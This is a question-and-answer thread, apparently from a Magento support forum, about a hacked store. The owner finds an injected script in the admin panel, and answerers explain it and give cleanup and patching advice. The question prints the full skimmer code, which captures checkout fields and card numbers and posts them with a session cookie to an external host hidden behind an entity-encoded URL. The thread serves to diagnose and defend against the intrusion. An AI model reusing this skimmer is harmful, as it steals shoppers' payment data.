# Anonymous Scripts found in "Miscellaneous Scripts" section magento admin panel

Tags: magento-1.9, security

Recently i had found some scripts inserted into the Miscellaneous Scripts section in admin panel.This code is not inserted by me!! how does it happen? the script i found was given below. can anybody explain me about this

```
<script>function j(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}j("SESSIID")||(document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html("&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#111;&#119;&#110;&#115;&#97;&#102;&#101;&#116;&#121;&#46;&#111;&#114;&#103;&#47;&#111;&#112;&#112;&#46;&#112;&#104;&#112;").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"),u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+j("SESSIID")),console.clear()}}})});</script>
```

Answer (score 6, accepted):

It will send your current admin session (so they don't need your admin login to get into admin panel!) and checkout data (customer name, address, order info, CC info, etc) to http://ownsafety.org/opp.php

Are you familiar with above website? Otherwise your website is probably hacked!

I would suggest to immediately remove that script, logout of the admin panel (to terminate that session) and do a website/server security audit. Scan your website for all the Magento vulnerabilities and make sure you have security extension installed to prevent this in future. http://www.magentocommerce.com/magento-connect/magesecure-security-extension.html

Comment: no!! i dont know this domain

Comment: Seems the website registrant is from Russia. If you don't know then you are hacked! Immediately remove that script and do a security audit of your website!

Comment: yes , i had removed it, already. how to do a security scan ?

Comment: Make sure you are not vulnerable of all the recent Magento vulnerabilities.. like the infamous Shoplift!

Comment: how can i identify this vulnerability ? im running on 1.9.0.1 ce

Comment: If you do not have advanced knowledge in security then it would be better to ask some web security guy to do audit.. they will check your logs, DB, files, etc..

Comment: Shoplift checker: https://shoplift.byte.nl/ Magento security extension: http://www.magentocommerce.com/magento-connect/magesecure-security-extension.html

Comment: While Magento developers can certainly point out security holes in a site, I'd wager that most of them do not have the expertise or access to perform a full server audit. On a site I recently found comprosmised, there were so many other things running that my Magento knowledge was of limited use. I could point out core files with suspicious modifications, but checking all the nooks and crannies of a server I am not familiar with is probably best left to the hosting facility.

Comment: the site is not patched with recent security update from magento, & i found some unknown user account in user section :(

Comment: my best bet is then ShopLift!!! Patch it now! Remove those unknown admin accounts, logout and then login to admin panel.

Comment: yes, removed it. A you said, after googling i had confirmed its ShopLift. and im going to update mage.

Comment: After applying the patch, recompile and clear the cache, then recheck with the shoplift check site to make sure you are patched. Then check for weird administrator accounts that have been added and remove, then check to make sure MagePleasure has not been installed. As to how to do this, it depends on what the hacker did, but you've been hacked and you will either need to do research or hire someone who can clean it up. With the use of MagePleasure, they can insert malicious php anywhere and modify Magento code to do includes.

Comment: @Fiasco Labs I , as my admin panel was compromised before. They definitely hav my paymeny gateway details like:: merchant key and salt. Doest this can cause any harm in future?

Comment: You should contact your card processor merchant services and get them changed. Your Gateway's web administration page may even have a section that allows you to reissue this key to get a new one as it's recommended that credentials be changed every so often. Usual method is to go and across the board, change all login passwords on everything. You never know what has been stolen.